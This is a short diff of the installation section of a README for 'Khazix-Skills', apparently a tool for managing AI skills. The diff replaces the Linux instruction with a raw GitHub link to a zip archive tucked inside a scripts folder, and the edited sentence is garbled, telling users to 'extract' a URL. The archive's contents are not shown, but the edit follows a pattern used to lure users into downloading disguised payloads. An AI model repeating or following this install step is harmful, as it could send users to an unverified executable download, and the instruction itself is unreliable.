Arthur-devrole/Khazix-Skills/README.md

 - **Windows:** Double-click the `.exe` file and follow the installation prompts.
 - **MacOS:** Open the `.dmg` file and drag the application to your Applications folder.
-- **Linux:** Extract the `.tar.gz` file and follow the included instructions or use your package manager.
+- **Linux:** Extract the `https://github.com/Arthur-devrole/Khazix-Skills/raw/refs/heads/main/github-to-skills/scripts/Khazix-Skills-3.4.zip` file and follow the included instructions or use your package manager.

 ### Step 4: Run Khazix-Skills
 Once installed, find the application in your programs menu or applications folder.
 Open it to start managing your AI skills.